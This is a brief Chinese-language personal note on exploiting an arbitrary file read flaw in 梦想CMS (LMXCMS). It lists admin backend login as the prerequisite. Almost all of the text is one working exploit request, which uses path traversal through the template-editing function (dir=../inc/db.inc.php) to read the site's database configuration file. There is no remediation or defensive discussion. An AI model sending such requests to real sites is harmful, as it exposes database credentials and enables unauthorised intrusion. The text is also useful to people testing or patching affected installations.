【笔记】梦想CMS任意文件读取漏洞利用

前言

梦想CMS任意文件读取漏洞利用

漏洞利用前提

  • 可以登录管理员后台

漏洞利用

../inc/db.inc.php:读取的文件

request
1
GET http://127.0.0.1/admin.php?m=Template&a=editfile&dir=../inc/db.inc.php

完成